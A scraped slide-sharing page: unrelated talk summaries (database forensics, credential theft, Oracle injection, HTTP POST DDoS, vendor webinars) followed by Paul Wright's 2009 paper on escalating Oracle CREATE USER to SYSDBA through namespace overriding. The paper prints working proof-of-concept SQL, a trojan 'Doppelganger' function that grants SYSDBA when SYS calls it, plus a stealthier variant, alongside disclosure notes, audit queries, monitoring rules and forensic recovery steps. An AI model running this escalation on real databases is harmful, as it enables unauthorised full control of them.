The document discusses database forensics and analysis techniques. It introduces current challenges, available tools, and new approaches using external tables to preserve metadata when collecting evidence. Typical patterns seen in database objects like SYS.USER$ are shown, like multiple accounts with login attempts or similar lock times indicating password guessing. Timeline creation is demonstrated to combine data from different sources.
This document provides an overview of database security platforms and the evolution of this market. Some key points:
- Database security platforms have evolved beyond just monitoring database activity and now incorporate features like vulnerability assessment, user rights management, data discovery/filtering, and blocking capabilities.
- The increased scope of monitoring coverage and additional security features mean "Database Activity Monitoring" is no longer an accurate term - these solutions are now more appropriately called "Database Security Platforms."
- These platforms consolidate multiple database security tools into a single solution and can monitor both relational and non-relational databases as well as multiple database types.
- Vendors are beginning to differentiate their database security platforms based on primary use cases
The document discusses how Windows Credentials Editor (WCE) can be used to obtain credentials stored in memory on Windows systems, allowing an attacker to steal usernames and hashes to perform pass-the-hash attacks without cracking passwords. WCE enables bypassing common pre-exploitation techniques by directly using harvested credentials. Leaving logon sessions disconnected rather than logged off can leave credentials exposed in memory as "zombie sessions".
By using specially crafted parameters in double quotes, it is possible to bypass the input validation of the Oracle dbms_assert package and inject SQL code. This allows dozens of already patched Oracle vulnerabilities to be exploited again across versions 8.1.7.4 to 10.2.0.2. The researcher notified Oracle of the problem in April 2006. To mitigate risks, privileges like CREATE PROCEDURE should be revoked to prevent injection of malicious functions or procedures.
This document describes a new method for exploiting PL/SQL injection without needing to create functions or procedures. It involves injecting a pre-compiled cursor using the DBMS_SQL package to execute arbitrary SQL. The attacker can use this to grant privileges to themselves or create their own functions without any system privileges beyond CREATE SESSION. It provides an example exploiting the SDO_DROP_USER_BEFORE trigger in Oracle to gain DBA privileges in this way without needing CREATE PROCEDURE permission.
1. The document discusses SSH tricks and configuration tips for securing SSH connections and servers. It provides examples of SSH client-side one-liners and ways to quickly set up an SSH server.
2. SSH is a secure network protocol for exchanging data between networked devices. The document outlines ways to lock down SSH servers and clients through configuration files and access controls.
3. The document shows examples of SSH port forwarding, tunnels, and other one-liners that can enable remote access or administration through SSH connections.
The document discusses a Layer 7 DDOS attack called an HTTP POST attack. It works by sending legitimate HTTP POST requests to a server but slowly sending the content over an extended period, tying up server resources. This attack is more effective than the HTTP GET Slowloris attack as it fully sends the HTTP headers immediately, bypassing defenses against Slowloris. The attack code example shows how it generates random content lengths and sends payload bytes slowly over time to perform the DDOS attack.
This document summarizes optimizations to TLS/SSL including False Start, Snap Start, and defenses against the BEAST attack. False Start allows the client to send application data before receiving the server's Finished message to reduce latency. Snap Start uses cached handshake parameters to further reduce latency. However, both introduce security risks. The BEAST attack exploits TLS CBC encryption and IV reuse, but can be prevented by changing the encryption mode or adding padding.
The document provides an overview of practical cryptography and the GPG/PGP encryption tools. It discusses symmetric and public key cryptography theory. It then demonstrates how to use GPG/PGP to generate keys, encrypt and decrypt files, digitally sign documents, verify signatures, and distribute public keys through a key server. It also discusses how the web of trust model works to validate identities through in-person key signing after carefully verifying a user's identity.
Kyle Young presents on SSH tricks and configuration tips. He discusses the history and uses of SSH, how to securely connect to SSH servers by verifying fingerprints, and ways to lock down SSH servers and clients through configuration files like sshd_config and ssh_config. He also shares some useful SSH client-side one-liners.
This document describes padding oracle attacks on cryptographic hardware devices that allow encrypted keys to be imported. It presents two types of attacks: 1) An improved Bleichenbacher attack that exploits RSA PKCS#1v1.5 padding to reveal an imported private key in an average of 49,000 oracle queries. 2) An adaptation of the Vaudenay CBC attack to reveal keys encrypted with CBC and PKCS#5 padding. It demonstrates these attacks on commercial security tokens, smartcards, and electronic ID cards to reveal stored cryptographic keys.
The document discusses proper password hashing methods for securely storing passwords. It begins by stating that most websites currently do not properly store passwords, either in plaintext or with a single hash without salt. This is irresponsible. The document then discusses proper hashing methods that should be used, including adding salt, using key derivation functions like PBKDF2, ARC4PBKDF2, and bcrypt. PBKDF2 works by repeatedly hashing the password with a salt, while ARC4PBKDF2 additionally encrypts the password and hashes with an evolving ARC4 stream for added complexity. Bcrypt is also an adaptive function that works similarly to PBKDF2 but in a more complicated way. The document
This document proposes a new method for improving the cryptanalytic time-memory trade-off technique. The original technique, introduced by Hellman in 1980, precomputes ciphertexts to reduce cryptanalysis time at the cost of memory usage. The new method reduces the number of calculations needed during cryptanalysis by a factor of two compared to the existing approach using distinguished points. As an example, the new method can crack 99.9% of Windows password hashes in 13.6 seconds using 1.4GB of precomputed data, much faster than the 101 seconds taken by the existing approach.
This document provides an introduction and overview of threading and concurrency in Perl. It begins with definitions of threads and concurrency basics. It then discusses Perl's implementation of threads since version 5.6, noting that global variables are non-shared by default and sharing must be explicit. The document outlines various threading primitives and synchronization mechanisms in Perl like locks, condition variables, and shows examples of building thread-safe data structures like queues. It concludes with best practices and implementing other common synchronization primitives.
The document is a series of lines repeatedly stating "Author: Bill Buchanan". It does not contain any other substantive information in the content. The author of the document is Bill Buchanan, as his name is listed on every line.
Unlocking Productivity: Leveraging the Potential of Copilot in Microsoft 365, a presentation by Christoforos Vlachos, Senior Solutions Manager – Modern Workplace, Uni Systems
Removing Uninteresting Bytes in Software FuzzingAftab Hussain
Imagine a world where software fuzzing, the process of mutating bytes in test seeds to uncover hidden and erroneous program behaviors, becomes faster and more effective. A lot depends on the initial seeds, which can significantly dictate the trajectory of a fuzzing campaign, particularly in terms of how long it takes to uncover interesting behaviour in your code. We introduce DIAR, a technique designed to speedup fuzzing campaigns by pinpointing and eliminating those uninteresting bytes in the seeds. Picture this: instead of wasting valuable resources on meaningless mutations in large, bloated seeds, DIAR removes the unnecessary bytes, streamlining the entire process.
In this work, we equipped AFL, a popular fuzzer, with DIAR and examined two critical Linux libraries -- Libxml's xmllint, a tool for parsing xml documents, and Binutil's readelf, an essential debugging and security analysis command-line tool used to display detailed information about ELF (Executable and Linkable Format). Our preliminary results show that AFL+DIAR does not only discover new paths more quickly but also achieves higher coverage overall. This work thus showcases how starting with lean and optimized seeds can lead to faster, more comprehensive fuzzing campaigns -- and DIAR helps you find such seeds.
- These are slides of the talk given at IEEE International Conference on Software Testing Verification and Validation Workshop, ICSTW 2022.
Full-RAG: A modern architecture for hyper-personalizationZilliz
Mike Del Balso, CEO & Co-Founder at Tecton, presents "Full RAG," a novel approach to AI recommendation systems, aiming to push beyond the limitations of traditional models through a deep integration of contextual insights and real-time data, leveraging the Retrieval-Augmented Generation architecture. This talk will outline Full RAG's potential to significantly enhance personalization, address engineering challenges such as data management and model training, and introduce data enrichment with reranking as a key solution. Attendees will gain crucial insights into the importance of hyperpersonalization in AI, the capabilities of Full RAG for advanced personalization, and strategies for managing complex data integrations for deploying cutting-edge AI solutions.
Sudheer Mechineni, Head of Application Frameworks, Standard Chartered Bank
Discover how Standard Chartered Bank harnessed the power of Neo4j to transform complex data access challenges into a dynamic, scalable graph database solution. This keynote will cover their journey from initial adoption to deploying a fully automated, enterprise-grade causal cluster, highlighting key strategies for modelling organisational changes and ensuring robust disaster recovery. Learn how these innovations have not only enhanced Standard Chartered Bank’s data infrastructure but also positioned them as pioneers in the banking sector’s adoption of graph technology.
Climate Impact of Software Testing at Nordic Testing DaysKari Kakkonen
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing discussed on the talk. ICT and testing must carry their part of global responsibility to help with the climat warming. We can minimize the carbon footprint but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be added with sustainability, and then measured continuously. Test environments can be used less, and in smaller scale and on demand. Test techniques can be used in optimizing or minimizing number of tests. Test automation can be used to speed up testing.
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc
How does your privacy program stack up against your peers? What challenges are privacy teams tackling and prioritizing in 2024?
In the fifth annual Global Privacy Benchmarks Survey, we asked over 1,800 global privacy professionals and business executives to share their perspectives on the current state of privacy inside and outside of their organizations. This year’s report focused on emerging areas of importance for privacy and compliance professionals, including considerations and implications of Artificial Intelligence (AI) technologies, building brand trust, and different approaches for achieving higher privacy competence scores.
See how organizational priorities and strategic approaches to data security and privacy are evolving around the globe.
This webinar will review:
- The top 10 privacy insights from the fifth annual Global Privacy Benchmarks Survey
- The top challenges for privacy leaders, practitioners, and organizations in 2024
- Key themes to consider in developing and maintaining your privacy program
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionAggregage
Join Maher Hanafi, VP of Engineering at Betterworks, in this new session where he'll share a practical framework to transform Gen AI prototypes into impactful products! He'll delve into the complexities of data collection and management, model selection and optimization, and ensuring security, scalability, and responsible use.
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfPaige Cruz
Monitoring and observability aren’t traditionally found in software curriculums and many of us cobble this knowledge together from whatever vendor or ecosystem we were first introduced to and whatever is a part of your current company’s observability stack.
While the dev and ops silo continues to crumble….many organizations still relegate monitoring & observability as the purview of ops, infra and SRE teams. This is a mistake - achieving a highly observable system requires collaboration up and down the stack.
I, a former op, would like to extend an invitation to all application developers to join the observability party will share these foundational concepts to build on:
Maruthi Prithivirajan, Head of ASEAN & IN Solution Architecture, Neo4j
Get an inside look at the latest Neo4j innovations that enable relationship-driven intelligence at scale. Learn more about the newest cloud integrations and product enhancements that make Neo4j an essential choice for developers building apps with interconnected data and generative AI.
“An Outlook of the Ongoing and Future Relationship between Blockchain Technologies and Process-aware Information Systems.” Invited talk at the joint workshop on Blockchain for Information Systems (BC4IS) and Blockchain for Trusted Data Sharing (B4TDS), co-located with with the 36th International Conference on Advanced Information Systems Engineering (CAiSE), 3 June 2024, Limassol, Cyprus.
Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...Zilliz
Join us to introduce Milvus Lite, a vector database that can run on notebooks and laptops, share the same API with Milvus, and integrate with every popular GenAI framework. This webinar is perfect for developers seeking easy-to-use, well-integrated vector databases for their GenAI apps.
In his public lecture, Christian Timmerer provides insights into the fascinating history of video streaming, starting from its humble beginnings before YouTube to the groundbreaking technologies that now dominate platforms like Netflix and ORF ON. Timmerer also presents provocative contributions of his own that have significantly influenced the industry. He concludes by looking at future challenges and invites the audience to join in a discussion.
Dr. Sean Tan, Head of Data Science, Changi Airport Group
Discover how Changi Airport Group (CAG) leverages graph technologies and generative AI to revolutionize their search capabilities. This session delves into the unique search needs of CAG’s diverse passengers and customers, showcasing how graph data structures enhance the accuracy and relevance of AI-generated search results, mitigating the risk of “hallucinations” and improving the overall customer journey.
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfMalak Abu Hammad
Discover how MongoDB Atlas and vector search technology can revolutionize your application's search capabilities. This comprehensive presentation covers:
* What is Vector Search?
* Importance and benefits of vector search
* Practical use cases across various industries
* Step-by-step implementation guide
* Live demos with code snippets
* Enhancing LLM capabilities with vector search
* Best practices and optimization strategies
Perfect for developers, AI enthusiasts, and tech leaders. Learn how to leverage MongoDB Atlas to deliver highly relevant, context-aware search results, transforming your data retrieval process. Stay ahead in tech innovation and maximize the potential of your applications.
#MongoDB #VectorSearch #AI #SemanticSearch #TechInnovation #DataScience #LLM #MachineLearning #SearchTechnology
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Create user to_sysdba
1. CREATE USER to SYSDBA via Namespace Overriding
Defence and Forensic Response ~ 11th July 2009
http://www.oracleforensics.com/wordpress/index.php/2009/07/10/create-user-to-sysdba/
Paul M. Wright ~ GSOC, GCFA, GCIH, GCIA, GCFW, GSE
Table of Contents:
1. Introductory Summary......................................................................................................... 1
2. CREATE USER to SYSDBA via Namespace Overriding ~ The Threat............................. 2
3. Oracle object namespace ambiguities ~ Heart of the problem ............................................ 3
4. Proof of concept code demonstration on 10.2.0.3.0 Linux.................................................. 4
5. Prevention, Defence, Monitoring and alerting..................................................................... 6
6. Forensic response................................................................................................................. 9
7. Conclusions........................................................................................................................ 11
8. References.......................................................................................................................... 11
1. Introductory Summary
Oracle Corp produce the World’s best Enterprise Relational Database, used by the World’s
leading Financial Services organisations. Due to the requirement for backward compatibility it
has been difficult to improve all functionality of the DB to the latest security standards. As an
example, this paper demonstrates a bug which allows escalation from the CREATE USER
system privilege to that of the SYSDBA system privilege. This is a significant escalation as
CREATE USER is commonly assigned to an application account or to support staff
responsible for handling users, whereas the SYSDBA account is held only by a Senior DBA
responsible for highly privileged actions such as dropping databases. Segregation of duty and
least privilege concepts, demand that no one should be able to escalate between these two
system privileges.
Please note that Oracle have already been informed about the bug and permission has been
granted to publish this paper from Redwood, to whom this vulnerability was first presented
three months ago. The most recent versions of the DB have been fixed, though widely used
versions such as 10.2.0.3.0 on GNU/Linux are still vulnerable. The best practices listed in
this paper along with the Sentrigo Hedgehog security monitoring rules will effectively protect
against this issue and ones related to it yet to be published. Lastly forensic response will be
used to address an example of a CREATE USER to SYSDBA escalation. This paper is the first
of two papers, the second of which is entitled ”CREATE PUBLIC SYNONYM to SYSDBA”
and will be presented first as part of the new SANS Database Application Monitoring course
at SANS London http://www.sans.org/london09/description.php?tid=3602.
1
2. 2. CREATE USER to SYSDBA via Namespace Overriding ~ The Threat
CREATE USER to SYSDBA privilege escalation can be done by making a copy of a legitimate
Built-in SYS function and putting it in a newly created schema which has a username equal to
the SYS package name. This attacker supplied function overrides the namespace of the SYS
function so that a DBA user logged in as SYS will unwittingly execute the attacker supplied
function when trying to execute the local Built-in SYS function. The attacker supplied function
is DEFINER rights with the attacker’s relatively low privileges as normal, so not arousing
suspicion, but SYS’s unique INVOKER rights “feature” overrides the packages DEFINER
rights causing the attacker’s code to run as SYS. This is not the documented behaviour for
DEFINER rights and can be considered a flaw [1] which is reasonably well known, though its
implications have not been fully explored as yet. Unfortunately, many DBA’s logon as SYS
most of the time, even when carrying out activities that do not require SYS, which makes this
attack quite effective. (DBAs please see best practise section later on).
A SYS user needs to be sure of the identity of the package they are invoking and that it is
trusted code i.e. has not been changed. This would normally be the case with a SYS package as
it resides in the SYS schema and cannot be affected by others, but if another package in
another schema could override the namespace of a SYS package, the DBA would be none the
wiser to the fact that they were executing untrusted code?
This paper will demonstrate a security bug new to the public domain, which enables
namespace overriding of a local SYS object. There are probably more related techniques as this
avenue has not been explored much by security researchers as of writing.
A typical threat scenario would be a developer controlled lower privileged application schema
account, or a support account used by Helpdesk for user management, could be escalated to
SYSDBA either by an insider or by an external attacker who found it easier to break in to the
lower privileged accounts and then escalate to SYSDBA privileges.
The fact that the Oracle namespace has ambiguities makes this CREATE USER to SYSDBA
escalation possible. These ambiguities are discussed in the next section.
2
3. 3. Oracle object namespace ambiguities ~ Heart of the problem
The objects in this paper are colour coded as follows in order to convey type and syntax of
otherwise similar looking commands:
Red = Schema owner
Yellow = Package
Green = Function
Blue = Synonym
There are a number of properties of the Oracle object namespace that make it vulnerable to
being manipulated.
1. Ability to omit the prefixing schema owner either by the package owner directly or by
another user calling the PUBLIC SYNONYM to refer to both the schema owner and
package name together e.g. DBMS_FLASHBACK is a PUBLIC SYNONYM that refers to
SYS.DBMS_FLASHBACK. Or in the case of this attack, SYS used can refer to the
package as just DBMS_FLASHBACK without prefixing. This variability can be
abused.
2. Ability to omit a package and shorten the namespace by creating a function without a
package directly in the schema e.g. OWNER.FUNCTION instead of
OWNER.PACKAGE.FUNCTION.
3. Ambiguity in the communication of type in the Oracle object namespace in that all
USERS, VIEWS, TABLES, PACKAGES, FUNCTIONS, PROCEDURES etc..
are all referenced in the same way i.e. NAME.NAME
So for example FOO.BAR could refer to TABLE.COLUMN, SCHEMA.TABLE,
OWNER.PACKAGE, PACKAGE.FUNCTION, OWNER.FUNCTION etc.
There is nothing intrinsic to the namespace that defines and communicates the type of
the object to the user.
The above ambiguities in the Oracle name space mean that a PACKAGE.FUNCTION call like
this made by SYS..
1. DBMS_FLASHBACK.GET_SYSTEM_CHANGE_NUMBER
can also be interpreted as an OWNER.FUNCTION call as follows..
2. DBMS_FLASHBACK.GET_SYSTEM_CHANGE_NUMBER
The point of interest is that the second command actually overrides the first, after a new
user with same name as the package is created with the new identical function directly in
the new schema! Oracle becomes confused by a schema owner that is the same as the
package name and puts the schema name of DBMS_FLASHBACK ahead of the package
name of DBMS_FLASHBACK in terms of SYS’s object execution priority!
These facts combined, enable the creation of a copied function that has the same name
resolution to the original, with replicated functionality but contains malicious code and
overrides the namespace of a Built-in function. When a DBA as SYS unknowingly executes
this “Doppelganger” function the attacker’s low privileged code is escalated to SYS and the
attacker can gain SYSDBA. This concept may be a bit difficult to get hold of at first so here is
some PoC code to both illustrate the process and prove the vulnerability.
3
4. 4. Proof of concept code demonstration on 10.2.0.3.0 Linux
--This is tested and working on multiple 10.2.0.3.0 Linux machines
--Attacker sets up the Doppelganger function that will override the SYS namespace
CREATE USER DBMS_FLASHBACK IDENTIFIED BY PW;
GRANT CREATE SESSION TO DBMS_FLASHBACK;
GRANT CREATE PROCEDURE TO DBMS_FLASHBACK;
CONN DBMS_FLASHBACK/PW;
CREATE OR REPLACE FUNCTION GET_SYSTEM_CHANGE_NUMBER RETURN VARCHAR
AS PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
execute immediate 'GRANT SYSDBA TO DBMS_FLASHBACK';
RETURN '123456';
END;
/
--Attacker tests the Doppelganger function and initiates the overriding
SELECT DBMS_FLASHBACK.GET_SYSTEM_CHANGE_NUMBER FROM DUAL;
ORA-01031:
insufficient privileges
--Grant execute to SYS
GRANT EXECUTE ON GET_SYSTEM_CHANGE_NUMBER TO SYS;
--SYS executes the Doppelganger without error message but escalates attacker to SYSDBA
[oracle@moscone oracle]$ sqlplus / as sysdba
SQL*Plus: Release 10.2.0.3.0 - Production on Thu May 1 21:08:33 2009
Copyright (c) 1982, 2006, Oracle. All Rights Reserved.
Connected to:Oracle Database 10g Enterprise Edition Release 10.2.0.3.0
--Only SYS is SYSDBA
SQL> SELECT * FROM V$PWFILE_USERS;
USERNAME SYSDB SYSOP
------------------------------ ----- -----
SYS TRUE TRUE
--SYS attempts to execute the local package but executes the Doppelganger
SQL> SELECT DBMS_FLASHBACK.GET_SYSTEM_CHANGE_NUMBER FROM DUAL;
GET_SYSTEM_CHANGE_NUMBER
-------------------------------------------------------------
123456
--Attacker’s account now has SYSDBA
SQL> SELECT * FROM V$PWFILE_USERS;
USERNAME SYSDB SYSOP
------------------------------ ----- -----
SYS TRUE TRUE
DBMS_FLASHBACK TRUE FALSE
--Fully qualified namespace unaffected and SYS package the same
SQL> SELECT SYS.DBMS_FLASHBACK.GET_SYSTEM_CHANGE_NUMBER FROM DUAL;
GET_SYSTEM_CHANGE_NUMBER
------------------------
8.0387E+10
--Doppelganger function still overrides the local SYS package
SQL> SELECT DBMS_FLASHBACK.GET_SYSTEM_CHANGE_NUMBER FROM DUAL;
GET_SYSTEM_CHANGE_NUMBER
-------------------------------------------------------------
123456
4
5. Please note that it is the Author’s experience that this code works perfectly first time on a fresh
server but subsequent attempts intermittently result in invalid errors. If you follow exactly the
code above on 10.2.0.3.0 Linux then the code is reliable first time. (Windows is not so
reliable). The intermittency of the vulnerability after first running the code confirmed the fact
that this is a bug and not an intended feature. Don’t run this code on a Production server!
The above code is a simple example, and could be implemented more thoroughly by returning
the correct return value for current SCN back to the DBA as per the example below.
CREATE OR REPLACE FUNCTION GET_SYSTEM_CHANGE_NUMBER RETURN VARCHAR
AS PRAGMA AUTONOMOUS_TRANSACTION;
mychar varchar2(30);
BEGIN
execute immediate 'grant sysdba to DBMS_FLASHBACK';
SELECT CURRENT_SCN INTO mychar FROM v$database;
RETURN mychar;
END;
/
Alternatively unwrapping SYS.DBMS_FLASHBACK and reproducing the package in full and
adding the malicious statement and wrapping again to a state that had the same checksum as
the original would be more effective. This is possible depending on the strength of the
checksum algorithm. Additionally the ability to create packages using wrapped code directly
make PL/SQL malware more difficult to rule out, as a developer may submit wrapped code to
SVN using this command.
CREATE OR REPLACE PROCEDURE PROC_NAME WRAPPED
…wrapped code.
Identifying malicious code in wrapped procedures is one legitimate use for an unwrapper.
http://technology.amis.nl/blog/4753/unwrapping-10g-wrapped-plsql
Though it should be noted that the intellectual property rights of the code’s author need to be
respected as well as local laws regarding proprietary wrapping algorithms,
.
Please see part II of this paper for a more indepth discussion, entitled
“CREATE PUBLIC SYNONYM to SYSDBA”.
Please note that it is not the aim of this paper to provide ammunition for miscreants which is
why this paper has been circulated to Oracle first and then to trusted partners before general
publication. Most importantly we need to discuss how to defend against ”CREATE USER to
SYSDBA” and how to alert to its use and finally forensically respond after an incident.
5
6. 5. Prevention, Defence, Monitoring and alerting
When a SYSDBA executes a package they must be sure of the identity of that package.
Overriding of the namespace occurs without informing the DBA either of the error or of the
actual effect of the command that they have issued i.e. a DBA will not know an overriding has
occurred. This fact makes it all the more important to follow best practises to prevent and
defend from this attack. Best practises are as follows:
1. Don’t execute packages as SYS, because DEFINER rights do not apply to SYS and its
privileges will carry through to the package. Though bear in mind that this may not
always be possible as some DBMS packages need to be executed as SYS e.g.
DBMS_STREAMS_AUTH.GRANT_ADMIN_PRIVILEGE
http://www.oracle.com/technology/obe/obe10gdb/integrate/streams/streams.htm?_template=/ocom/print
http://kr.forums.oracle.com/forums/thread.jspa?threadID=540770
It is interesting to note that the Oracle documentation above does not fully qualify the SYS
package name with the schema so the command in the documentation above could also be
vulnerable to an object namespace attack from a user with CREATE USER system
privilege escalating to SYSDBA.
DBAs and Developers should prefix packages more often in their code especially if it is
being executed by a user with high privileges. It is easy to do and avoids not only privilege
escalation security issues but also lowers the number of software bugs due to synonym
issues (see Part II of this paper to be published at SANS and UKOUG).
2. Don’t use an account with higher privileges than are required. Many actions can be
done with a READONLY account and most actions can be done with a DBA role
account, there is no excuse for always logging on as SYS or as “/ as SYSDBA”.
3. Add this query to the regular DB security audit, in order to check if an object name is
the same as a username:
SQL> (SELECT USERNAME FROM DBA_USERS) INTERSECT (SELECT
OBJECT_NAME FROM DBA_OBJECTS);
USERNAME
--------------------------------------------------------
DBMS_FLASHBACK
4. Closely monitor and restrict accounts which have the CREATE USER system
privilege.
Additional to these best practises an organisation that is serious about database security
should use an advanced Database Activity Monitoring system like Sentrigo Hedgehog [5]
which can differentiate between schema names and object names from the SQL text in a
query. HH can also identify the schema owner of an object when the schema is not
specified in the query (more on that in the next paper). So how to alert to an Object
Namespace Overriding Attack using Sentrigo Hedgehog? …
This is achieved by using the object rule keyword instead of the statement rule
keyword in HH. The object rule keyword intelligently recognises the specific
schema.object pairing actually being called when only the object is specified in the
triggering SQL query, whereas statement uses simple pattern matching similar to
network based IDS systems.
6
7. This means that a rule could be created that only triggered when an object in a specific
schema was executed which reduces false positives. In this simple example an
OWNER.PACKAGE object is specified.
object='PAULMWRIGHT.PAULSPACKAGE'
The rule above will trigger with this SQL below, where the function being referenced is
actually in the PAULMWRIGHT schema, which is not discernable from the just the SQL
being ran on its own:
CALL PAULSPACKAGE.PAULSFUNC();
Or to combat an Object Namespace Attack using a Doppelganger function like that shown
in this paper, a rule can be constructed to alert if the same object name was called from a
schema other than the authorised schema i.e. alert if a Doppelganger is called:
statement CONTAINS 'PAULSPACKAGE' and object NOT MATCHES 'PAULMWRIGHT.PAULSPACKAGE'
If this alert triggers, a call is being made to another PAULSPACKAGE but not in the
PAULMWRIGHT schema, so somebody may have confused the namespace deliberately, or
accidentally created an identically named object or it may be an accidentally incorrect call.
Either way the alert allows the issue to be addressed appropriately.
Another benefit of Sentrigo HH being able to intelligently identify the schema is that IDS
bypass techniques using a differently named synonym pointing to the target object will not
bypass the alert rule.
SELECT * FROM PAULMWRIGHT.PAULSTABLE; -- triggers alert
CREATE PUBLIC SYNONYM testsyn FOR PAULMWRIGHT.PAULSTABLE;
SELECT * FROM testsyn; --Still triggers the HH alert as shown in the
screenshot on the following page!
Evasion of well written Hedgehog rules is virtually impossible in the Author’s experience.
Note that from this rule and alert, the result can either be sent via email directly to the security
team, or sent to Nagios, Window’s event logs, Syslog or emailed as an Excel report and stored
in a backend relational database such as Oracle or SQL Server so that the results can be
compared with the other security related alerts from other systems.
Again more on this in the next paper, as well as the SANS DAMS Course [9].
7
8. Figure 1 Hedgehog can detect the actual schema.object being called by a query
8
9. 6. Forensic response
This particular example of overriding the object namespace has some identifying signatures.
1. Username the same as an existing object.
2. Trojan’d Doppelganger function with same name as the original SYS function.
In the event of an incident we can search to see if a suspiciously named object exists:
SQL> (SELECT USERNAME FROM DBA_USERS) INTERSECT (SELECT OBJECT_NAME
FROM DBA_OBJECTS);
USERNAME
--------------------------------------------------------
DBMS_FLASHBACK
--when was the account created (CTIME) and its current status:
SQL> select name, password, ctime, ptime, astatus from sys.user$ where
name='DBMS_FLASHBACK';
NAME PASSWORD CTIME PTIME ASTATUS
------------------ --------------------------- --------- -------------
DBMS_FLASHBACK 85DA688B3D085796 13-APR-09 13-APR-09 0
--objects with similar name can also provide some clue.
SELECT COUNT(*) OWNER, OBJECT_NAME FROM DBA_OBJECTS
GROUP BY OBJECT_NAME ORDER BY COUNT(*) ASC;
However, it is highly likely that the Doppleganger function and new schema have been
dropped after the attacker has gained SYSDBA and subsequently gained the data they were
seeking. So where can evidence of this attack be found? Let’s look at the scenario as follows:
--Attacker drops the account after the privilege escalation and attack has finished and DBA
happens to have rebooted the system, before suspecting the attack.
SQL> drop user dbms_flashback cascade;
User dropped.
SQL> shutdown immediate;
Database closed.
Database dismounted.
ORACLE instance shut down.
SQL> startup
ORACLE instance started.
Total System Global Area 171966464 bytes
Fixed Size 787988 bytes
Variable Size 145750508 bytes
Database Buffers 25165824 bytes
Redo Buffers 262144 bytes
Database mounted.
Database opened.
SQL>
Question: Is there still evidence of the previous existence of a user that has the same name as a
SYS object? What does the Forensic Analyst see in the SYSTEM01.dbf? ….
9
10. Figure 2 Data File and Answer: The DROPped username is persisted with the password as well!
Thus the Forensic Examiner can identify that a suspiciously named user has been created and
deleted. Though this process would be hampered in the case of TDE (Transparent Data
Encryption) as the data file will not be readable by an analyst in this way.
http://www.oracle.com/technology/deploy/security/database-security/transparent-data-encryption/index.html
This fact means that there will be a future demand for the ability to decrypt or at least search
for objects marked as deleted within TDE data files. A tool that could do this would be of great
use to a forensic examiner responding to incidents on Oracle databases. This feedback has
already been given to Oracle whom have been diligent and helpful
10
11. 7. Conclusions
This paper has shown a CREATE USER to SYSDBA system privilege escalation using the
novel vector of overriding SYS’s object namespace with an attacker supplied Doppelganger
function.
Oracle are improving the database by making the namespace resilient to this type of attack.
This is the first paper to detail this particular issue so best practises detailed in this paper need
to be adopted by DBAs in the meantime.
DBAs should avoid executing packages as SYS wherever possible due to the DEFINER rights
flaw [1] which effectively escalates the privileges of the package to SYS.
Security departments should use an advanced host based IDS that can identify the schema of an
object when it is not specified in the SQL query. Sentrigo Hedgehog is an industry proven
example of such a system [5] with the advantage of being able to alert to traffic that was
encrypted over the network by SSH as well as having an audit trail that is non-modifiable by a
user that has managed to gain SYSDBA privileges.
DBAs must be confident in what they are executing so it is certainly worth moving away from
synonyms[2] and using fully qualified paths for objects, not just for security but also for
performance [3]. Please see the upcoming Part II of this paper which will be entitled “CREATE
PUBLIC SYNONYM to SYSDBA” for more detail [11], along with the upcoming SANS
course [9].
Lastly DB security teams need to implement good all round data security and incident response
best practice as detailed in the first book [6] on Database Forensics [7].
8. References
[1] http://www.pythian.com/news/352/calling-definer-rights-procedure-as-sysdba-security-hole
[2] http://www.dba-oracle.com/concepts/synonyms.htm
[3] http://asktom.oracle.com/pls/asktom/f?p=100:11:0::::P11_QUESTION_ID:7555433442177
[4] http://www.oracleforensics.com/wordpress/index.php/2009/01/18/db-data-forensics/
[5] http://www.sentrigo.com/products/hedgehog-enterprise
[6] http://www.rampant-books.com/book_0701_oracle_forensics.htm
[7] http://en.wikipedia.org/wiki/Database_Forensics
[8] http://www.oracleforensics.com
[9] http://www.sans.org/london09/description.php?tid=3602
[10] http://www.ukoug.org/2009
[11] ”CREATE PUBLIC SYNONYM to SYSDBA” ~ to be published later this year.
11